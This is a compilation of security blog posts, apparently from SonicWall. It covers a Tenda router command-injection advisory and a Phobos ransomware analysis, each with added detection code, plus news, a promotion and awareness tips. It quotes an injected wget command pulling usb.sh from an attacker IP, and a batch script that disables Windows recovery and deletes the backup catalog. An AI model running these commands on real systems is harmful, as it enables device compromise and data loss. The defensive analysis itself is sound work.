Attackers actively targeting Tenda WiFi router vulnerability

SonicWall Capture Labs Threat Research team observes attackers actively exploiting the arbitrary remote code execution vulnerability reported in the Tenda AC15 router. The Tenda AC15 is an AC1900 Smart Dual-band Gigabit Wi-Fi Router designed for smart home networking.

CVE-2020-10987 | Vulnerability:

The goform/setUsbUnload endpoint of Tenda AC15 AC1900 version 15.03.05.19 allows remote attackers to execute arbitrary system commands via the deviceName parameter. The vulnerability is due to improper validation of the deviceName input parameter: its value is passed directly to the doSystemCmd function, resulting in arbitrary command execution.

Exploit:

In the captured exploit request below, the attacker passes a malicious shell command through the deviceName parameter, allowing arbitrary code execution.

This command downloads a reverse shell to the temp directory and executes it.

When usb.sh is executed, it downloads more payloads from the attacker's server 5.252.194.29 and executes them one by one.
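As an added example, not part of the SonicWall advisory, the following Python detection logic scans web-access-log lines for requests to the goform/setUsbUnload endpoint whose deviceName value carries shell metacharacters or references one of the published indicator addresses. The log lines are constructed for illustration, and the allowlist pattern for a legitimate deviceName is an assumption.

```python
import re
from urllib.parse import urlsplit, unquote_plus

IOC_IPS = {"185.39.11.105", "5.252.194.29"}          # indicators published in the advisory
SHELL_META = re.compile(r"[;&|`$(){}<>\r\n]")         # never legitimate in a device name
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,32}$")      # assumed legitimate form, e.g. "sda1"
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*"')

# Constructed sample lines (combined log format), not captured traffic; line 3 carries an
# injected command of the kind described above, fetching usb.sh from the published address.
SAMPLE_LOG = """\
185.39.11.105 - - [02/Oct/2020:10:00:01 +0000] "POST /goform/setUsbUnload HTTP/1.1" 200 12
198.51.100.7 - - [02/Oct/2020:10:00:02 +0000] "GET /goform/setUsbUnload?deviceName=sda1 HTTP/1.1" 200 12
203.0.113.5 - - [02/Oct/2020:10:00:03 +0000] "GET /goform/setUsbUnload?deviceName=A%3Bwget%20http%3A%2F%2F5.252.194.29%2Fusb.sh%20-O%20%2Ftmp%2Fusb.sh HTTP/1.1" 200 12
203.0.113.5 - - [02/Oct/2020:10:00:04 +0000] "GET /index.html HTTP/1.1" 200 512
"""

def query_values(query, key):
    """Decode every value of `key`, splitting on '&' only so an injected ';' stays in the value."""
    values = []
    for pair in query.split("&"):
        k, _, v = pair.partition("=")
        if unquote_plus(k) == key:
            values.append(unquote_plus(v))
    return values

def analyze_line(line):
    """Findings for one access-log line; empty list when nothing is suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    if m.group("src") in IOC_IPS:
        findings.append(f"source {m.group('src')} is a published IOC")
    parts = urlsplit(m.group("target"))
    if parts.path != "/goform/setUsbUnload":
        return findings
    for name in query_values(parts.query, "deviceName"):
        if not SAFE_NAME.match(name):
            findings.append(f"deviceName outside allowlist: {name!r}")
        if SHELL_META.search(name):
            findings.append("deviceName contains shell metacharacters")
        if any(ip in name for ip in IOC_IPS):
            findings.append("deviceName references a published IOC address")
    return findings

def scan(log_text):
    """Map 1-based line numbers of suspicious requests to their findings."""
    return {n: f for n, line in enumerate(log_text.splitlines(), 1) if (f := analyze_line(line))}
```

Requests carrying the parameter in a POST body are not visible in an access log, so the first sample line is flagged only because of its source address.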

Trend Chart:

IOC:

185.39.11.105
5.252.194.29

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

  • IPS: 13634 Suspicious Request URI 17
  • IPS: 5811 Web Application Suspicious File Upload 1 -c2
  • IPS: 3141 Web Application Suspicious File Upload 11
  • IPS: 15028 Web Application Suspicious File Upload 18


Cybersecurity News & Trends – 10-02-20

This week, attackers targeted everything from the energy sector and the U.S. elections to social media accounts and your coffeemaker.


SonicWall in the News

The 100 People You Don’t Know but Should 2020 — CRN

  • SonicWall’s Jason Carter has been selected to be part of CRN’s annual “100 People You Don’t Know but Should” list.

How Home Tech Can Be Companies’ Weakest Link — Financial Times (Business Education)

  • SonicWall President and CEO Bill Conner weighs in on how companies can protect against risks due to remote employees’ home network setups.

Managed IT Service Providers Expands Support For Remote Workers During Pandemic — Crain’s Detroit Business

  • In March, SonicWall helped Vision Computer Solutions acquire additional licenses more quickly than normal so the company could rapidly transition to remote work.

These 13 Israeli Cybersecurity Startups Have Raised a Collective $847 Million in Funding This Year for New Tools That Protect Remote Work — Business Insider

  • Perimeter 81 — which SonicWall has invested in — is included in the roundup as a cloud-based company helping IT and security professionals more easily secure remote access.

Industry News

U.S. tech giants face curbs on data sharing, digital marketplaces, under draft EU rules — Reuters

  • Google, Facebook, Amazon, Apple and other U.S. tech giants could be banned from favoring their services or forcing users to sign up to a bundle of services under draft EU rules.

House passes bills to secure energy sector against cyberattacks — The Hill

  • The House has unanimously passed four bills aimed at securing the power grid and other energy infrastructure against cyberattacks.

Microsoft looks to expose espionage groups taking aim at NGOs, US politics — Cyberscoop

  • Cyberscoop summarizes the new Microsoft report, a detailed review of criminal and government hackers’ tradecraft.

When coffee makers are demanding a ransom, you know IoT is screwed — Ars Technica

  • With the name Smarter, you might expect a network-connected kitchen appliance maker to be, well, smarter than companies selling conventional appliances. But in the case of Smarter’s IoT coffee maker, you’d be wrong.

CISA Warns of Hackers Exploiting Zerologon Vulnerability — Security Week

  • The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an alert to warn of attackers actively targeting a recently addressed vulnerability in the Microsoft Windows Netlogon Remote Protocol (MS-NRPC).

Microsoft disrupts nation-state hacker op using Azure Cloud service — Bleeping Computer

  • In a report today, Microsoft said that it disrupted operations of a nation-state threat group that was using its Azure cloud infrastructure for cyberattacks.

Ransomware Attacks Take On New Urgency Ahead of Vote — The New York Times

  • Attacks against small towns, big cities and the contractors who run their voting systems have federal officials fearing that hackers will try to sow chaos around the election.

FBI director warns that Chinese hackers are still targeting US COVID-19 research — The Hill

  • FBI Director Christopher Wray said Chinese hackers are continuing to target U.S. companies involved in COVID-19 research and described China as the nation’s “greatest counterintelligence threat.”

Mount Locker ransomware joins the multi-million dollar ransom game — Bleeping Computer

  • A new ransomware operation named Mount Locker is stealing victims’ files before encrypting and then demanding multi-million dollar ransoms.

FBI Director: Feeding DOD’s Cyber Offense Operations Is Crucial to New Strategy — Nextgov

  • Senator says legislation is moving forward to thwart intellectual property theft and defend federal networks from cyberattacks.

Phishing attacks are targeting your social network accounts — Bleeping Computer

  • Scammers are targeting your social network accounts with phishing emails that pretend to be copyright violations or promises of a shiny ‘blue checkmark’ next to your name.

In Case You Missed It

Operator of new Phobos variant gives blunt response during negotiation

The SonicWall Capture Labs Threat Research team has observed a new variant from the Phobos ransomware family. Like Sodinokibi, Phobos is sold on the criminal underground using the ransomware-as-a-service (RaaS) model. It is spread using various infection methods, such as vulnerable Remote Desktop connections and spam email attachments. In the past we have seen Phobos primarily targeting businesses. However, recently we have also seen several reports of individuals being hit with this malware. During our analysis of this malware, we negotiated ransom payment with the operator.


Infection cycle:


Upon infection, the following files are dropped onto the system:

  • %APPDATA%\roaming\microsoft\windows\start menu\programs\startup\db_exec.exe [Detected as: GAV: Phobos.RSM_12 (Trojan)]
  • {malware run location}\TempWmicBatchFile.bat
  • {desktop}\info.hta
  • {desktop}\info.txt


Files on the system are encrypted and given the following extension:

  • id[94458690-2589].[helpisos@aol.com].isos


TempWmicBatchFile.bat contains the following script which, when executed, disables system recovery features:

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
exit
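As an added example, not part of the SonicWall write-up, the following Python detection logic matches process-creation command lines against the three recovery-inhibiting commands in TempWmicBatchFile.bat and correlates them by parent process; it also recognises the id[...].[email].isos file-name pattern described above. The event records are constructed sample data, not real telemetry.

```python
import re

# The three recovery-inhibiting commands from the dropped TempWmicBatchFile.bat shown above.
RECOVERY_INHIBIT_RULES = {
    "bcdedit_ignore_boot_failures": re.compile(
        r"\bbcdedit(\.exe)?\b.*\s/set\s+\{default\}\s+bootstatuspolicy\s+ignoreallfailures", re.I),
    "bcdedit_disable_recovery": re.compile(
        r"\bbcdedit(\.exe)?\b.*\s/set\s+\{default\}\s+recoveryenabled\s+no\b", re.I),
    "wbadmin_delete_catalog": re.compile(r"\bwbadmin(\.exe)?\b.*\sdelete\s+catalog\b", re.I),
}
# Encrypted-file naming described above: <name>.id[<victim id>-<n>].[<contact email>].isos
ISOS_NAME = re.compile(r"\.id\[[0-9A-Fa-f]+-\d+\]\.\[[^\]\s]+@[^\]\s]+\]\.isos$")

# Constructed process-creation events (simplified Sysmon Event ID 1 fields), not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 1201, "ppid": 1200, "cmdline": "bcdedit /set {default} bootstatuspolicy ignoreallfailures"},
    {"pid": 1202, "ppid": 1200, "cmdline": "bcdedit /set {default} recoveryenabled no"},
    {"pid": 1203, "ppid": 1200, "cmdline": "wbadmin delete catalog -quiet"},
    {"pid": 1300, "ppid": 900, "cmdline": "bcdedit /enum"},          # benign admin use
    {"pid": 1301, "ppid": 900, "cmdline": "wbadmin get versions"},   # benign admin use
]

def matched_rules(cmdline):
    """Names of the recovery-inhibit rules that fire on one command line."""
    return [name for name, rx in RECOVERY_INHIBIT_RULES.items() if rx.search(cmdline)]

def correlate_by_parent(events):
    """Group fired rules by parent PID. A parent whose children trigger all three rules
    reproduces the whole TempWmicBatchFile.bat sequence and is rated 'high'."""
    by_parent = {}
    for ev in events:
        for name in matched_rules(ev["cmdline"]):
            by_parent.setdefault(ev["ppid"], set()).add(name)
    return {ppid: ("high" if names == set(RECOVERY_INHIBIT_RULES) else "medium", sorted(names))
            for ppid, names in by_parent.items()}

def is_phobos_isos_name(path):
    """True if a file name follows the id[...].[email].isos pattern of this variant."""
    return ISOS_NAME.search(path) is not None

if __name__ == "__main__":
    print(correlate_by_parent(SAMPLE_EVENTS))
    print(is_phobos_isos_name(r"C:\Users\x\report.docx.id[94458690-2589].[helpisos@aol.com].isos"))
```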


info.hta contains the ransom message and is displayed multiple times on the desktop:


info.txt also contains the ransom message:


Negotiation:


We attempted to reach out to helpisos@aol.com as instructed in the ransom note but were notified by the email server that the address “couldn’t be found, or is unable to receive mail”. We proceeded to contact @iso_recovery on Telegram and had the following conversation with the operator:


Nowadays, ransom fees for individuals are negotiable. We tried our luck to see how much of a discount was available:


We attempted to push further and enlighten the operator about our “dire financial situation” but received the following blunt response:


SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Phobos.RSM_12 (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

‘3 & Free’ Promotion: How to Upgrade Your SonicWall Firewall for Free

You can’t rely on yesterday’s solutions to thwart tomorrow’s attacks.

And as these attacks become more sophisticated, varied and numerous than ever, it’s never been more crucial to defend your organization’s networks, data and applications.

Often, this means ensuring your organization is protected by the latest and most cost-effective firewall appliances and real-time security services. That’s why the SonicWall ‘3 & Free’ program makes it easy for customers to upgrade from their legacy firewall to the latest SonicWall NSa 2650, TZ350 or SOHO 250 firewalls.

When you upgrade your SonicWall firewall you gain the latest in next-generation firewall (NGFW) technology and access to the SonicWall Capture Advanced Threat Protection (ATP) service. It’s a cloud-based, multi-engine sandbox that stops both known and unknown cyberattacks from critically impacting your business.

What is the SonicWall ‘3 & Free’ Promotion?

The limited-time SonicWall ‘3 & Free’ promotion is the easy, cost-effective way for customers to upgrade to the very latest SonicWall next-generation firewall appliance for free.

Through Oct. 31, 2020, eligible customers may receive a complimentary NSa 2650, TZ350 or SOHO 250 appliance by purchasing a bundle that includes a three-year subscription of the SonicWall Advanced Gateway Security Suite from their authorized SonicWall SecureFirst partner.

This security suite includes everything you need to stay protected against today’s modern attacks, including advanced malware, ransomware, encrypted threats, viruses, spyware, zero-day exploits and more. This complete service includes:

SonicWall’s exclusive security subscription service also includes SonicWall Real-Time Deep Memory Inspection (RTDMI). A patent-pending technology, RTDMI™ enables Capture ATP to detect and block malware that does not exhibit any malicious behavior or hides weaponry via encryption. This protects your organization from zero-day attacks, malicious PDFs and Microsoft Office files.

Upgrade Your SonicWall Firewall for Free

Ready to upgrade? Take advantage of our ‘3 & Free’ program to get the latest in SonicWall next-generation firewall technology — for free. To upgrade, talk to a SonicWall cybersecurity expert today or contact your dedicated SecureFirst Partner.

National Cybersecurity Awareness Month Empowers Individuals, Orgs to Own Their Role in Cybersecurity

What’s scarier than Dracula, trickier than a haunted house and more expensive than a giant bucket of Halloween candy? Cyberattacks — and they can devastate individuals and organizations alike. Fortunately, however, they can be prevented if we all contribute. Today marks the beginning of the 17th annual National Cybersecurity Awareness Month, and this year SonicWall will bring you tips, best practices and more to ensure you’re ready to “Do Your Part. #BeCyberSmart.”

Each October, the National Cyber Security Alliance collaborates with the Cybersecurity and Infrastructure Security Agency (CISA) to launch a month-long campaign highlighting new and emerging threats and helping ensure all Americans have the resources they need to be safer and more secure online.

“While technology — a luxury turned necessity — continues to improve the quality of lives and economies around the world, some individuals will naturally try to navigate around it or simply bypass it altogether, placing themselves and their organization at risk,” said SonicWall President and CEO Bill Conner. “Now that mobile and remote workforces rely upon extended distributed networks that include everything from corporate offices to homes, global cybersecurity awareness initiatives are key to educating the masses on the importance of doing their part to protect everything from personal devices, home networks, critical data and infrastructure.”

The theme for 2020, “Do Your Part. #BeCyberSmart,” encourages individuals and organizations to own their role in protecting their part of cyberspace. Being more secure online is a shared responsibility, but by taking proactive steps toward lasting, positive cybersecurity behaviors at work and at home, each of us can help create a safer cyber environment.

As National Cybersecurity Awareness Month Champions, SonicWall’s cybersecurity experts will spend the next month exploring ways to help organizations and individuals protect their information and secure their systems and devices. We’ll explore several topics in depth, but in the meantime, here are some steps each of us can take today:

  • LOCK DOWN YOUR LOGIN
    Use long, unique passphrases that are hard to break but easy to remember for each account, and utilize two-factor or multifactor authentication wherever possible.
  • WHEN IN DOUBT, THROW IT OUT
    Email, social media posts, texts and more aren’t always what they seem — sometimes they harbor malware or malicious links. If you’re unsure about it, hit “delete.”
  • KEEP A CLEAN MACHINE
    Keep all software current to reduce risk of infection from ransomware and malware.
  • BACK IT UP
    Create backups of valuable data. In the case of ransomware or other threats, they can help prevent permanent loss.
  • OWN YOUR ONLINE PRESENCE
    Set up privacy and security settings immediately and check them regularly to ensure they’re still configured to your comfort.
  • SHARE WITH CARE
    Think about the potential consequences before posting personal info about yourself or others.
  • GET SAVVY ABOUT WI-FI HOTSPOTS
    These are not secure, meaning anyone could see what you’re doing while you’re connected to them. Consider a VPN or mobile hotspot for greater security.

“In the physical world, we all know a chain is only as strong as its weakest link,” said Chad Sweet, founder and CEO, The Chertoff Group. “The same is true in cyber. None of us want to be that weak link — failing to protect ourselves, our families or our businesses. As key players like NCSA, DHS and SonicWall have rightly challenged us to do, we need to use National Cybersecurity Awareness Month as a call to action for all of us to recommit to strengthening the ‘links’ where we play a critical role at home, in the office and in our communities.”

About NCSAM

National Cybersecurity Awareness Month was launched by the National Cyber Security Alliance (NCSA) and the U.S. Department of Homeland Security (DHS) in October 2004 as a broad effort to help all Americans stay safer and more secure online. Following wide success of the ‘Our Shared Responsibility’ theme in years past, CISA and NCSA have shifted strategic focus to a message that promotes personal accountability.

To learn more about NCSAM, please visit StaySafeOnline.org.